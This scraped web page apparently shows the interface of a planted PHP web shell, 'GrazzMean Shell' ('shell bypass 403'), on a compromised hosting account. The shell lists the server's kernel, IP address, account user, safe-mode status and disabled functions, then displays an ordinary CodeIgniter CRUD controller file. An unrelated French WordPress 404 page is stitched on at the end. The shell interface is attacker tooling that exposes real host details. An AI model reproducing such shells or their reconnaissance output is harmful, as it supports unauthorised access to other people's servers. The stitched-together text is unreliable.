shell bypass 403

GrazzMean Shell

Uname: Linux webm016.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Software: Apache
PHP version: 7.4.33 [ PHP INFO ] PHP os: Linux
Server Ip: 54.36.31.145
Your Ip: 216.73.216.182
User: homesquasz (91404) | Group: users (100)
Safe Mode: OFF
Disable Function:
_dyuweyrj4,_dyuweyrj4r,dl

name : Societe.php
<?php
/* 
 * Generated by CRUDigniter v3.2 
 * www.crudigniter.com
 */
 
class Societe extends FrontApplication{
    function __construct()
    {
        parent::__construct();
        $this->load->model('Societe_model');
    } 

    /*
     * Listing of societe
     */
    function index()
    {
        $params['limit'] = RECORDS_PER_PAGE; 
        $params['offset'] = ($this->input->get('per_page')) ? $this->input->get('per_page') : 0;
        
        $config = $this->config->item('pagination');
        $config['base_url'] = site_url('societe/index?');
        $config['total_rows'] = $this->Societe_model->get_all_societe_count();
        $this->pagination->initialize($config);

        $this->data['societe'] = $this->Societe_model->get_all_societe($params);
        
        $this->data['_view'] = 'societe/index';
        $this->load->view('layouts/main',$this->data);
    }

    /*
     * Adding a new societe
     */
    function add()
    {   
        $this->load->library('form_validation');

		$this->form_validation->set_rules('nom','Nom','required');
		
		if($this->form_validation->run())     
        {   
            $params = array(
				'nom' => $this->input->post('nom'),
				'logo' => $this->input->post('logo'),
            );
            
            $societe_id = $this->Societe_model->add_societe($params);
            redirect('societe/index');
        }
        else
        {            
            $this->data['_view'] = 'societe/add';
            $this->load->view('layouts/main',$this->data);
        }
    }  

    /*
     * Editing a societe
     */
    function edit($id)
    {   
        // check if the societe exists before trying to edit it
        $this->data['societe'] = $this->Societe_model->get_societe($id);
        
        if(isset($this->data['societe']['id']))
        {
            $this->load->library('form_validation');

			$this->form_validation->set_rules('nom','Nom','required');
		
			if($this->form_validation->run())     
            {   
                $params = array(
					'nom' => $this->input->post('nom'),
					'logo' => $this->input->post('logo'),
                );

                $this->Societe_model->update_societe($id,$params);            
                redirect('societe/index');
            }
            else
            {
                $this->data['_view'] = 'societe/edit';
                $this->load->view('layouts/main',$this->data);
            }
        }
        else
            show_error('The societe you are trying to edit does not exist.');
    } 

    /*
     * Deleting societe
     */
    function remove($id)
    {
        $societe = $this->Societe_model->get_societe($id);

        // check if the societe exists before trying to delete it
        if(isset($societe['id']))
        {
            $this->Societe_model->delete_societe($id);
            redirect('societe/index');
        }
        else
            show_error('The societe you are trying to delete does not exist.');
    }
    
}
© 2026 GrazzMean
Page non trouvée – APK Comptoir Hammami
Jannah Theme License is not validated, Go to the theme options page to validate the license, You need a single license for each domain name.

404 :(

Oups ! Cette page est introuvable.

Il semble que nous ne puissions pas trouver ce que vous cherchez. Peut-être qu'une recherche pourrait vous aider.

Bouton retour en haut de la page